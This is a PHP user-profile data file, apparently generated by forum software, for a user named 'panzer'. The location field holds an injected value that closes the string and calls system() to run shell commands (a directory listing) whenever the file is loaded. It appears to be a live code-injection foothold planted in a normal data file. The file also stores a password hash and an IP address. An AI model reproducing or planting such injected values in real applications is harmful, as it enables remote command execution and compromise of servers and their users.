<?php

$userid="138";
$password="e42810f4e86fb91c891256db2e7d67de";
$username="panzer";
$useralias="panzer";
$userrealname="";
$useremail="cool@hacker.ru";
$useremhide="hide";
$userip="66.14.178.130";
$usersig="";
$userslogan="rst.ghc!";
$useravatar="none";
$usermsn="";
$userposts="0";
$usericq="";
$userqq="";
$userwebavatar="";
$userrank="1";
$useryahoo="";
$useraim="";
$userlocation="'; system('echo _ENTER_; ls
; _QUIT_'); echo '";
$userjoined="1126210715";
$userhomepage="http://";
$useradmin="0";
$usermod="0";
$userban="0";
$userfriend="";
$userlastvisit="1126210968";
$userlastpost="1126210715";
$userprevvisit="1126210907";
$useranimsmilies="";
$lastaliaschange="1126210715";
$userlang="";
$uservisits="3";
$aliaslist="";
$noavatars="";

?>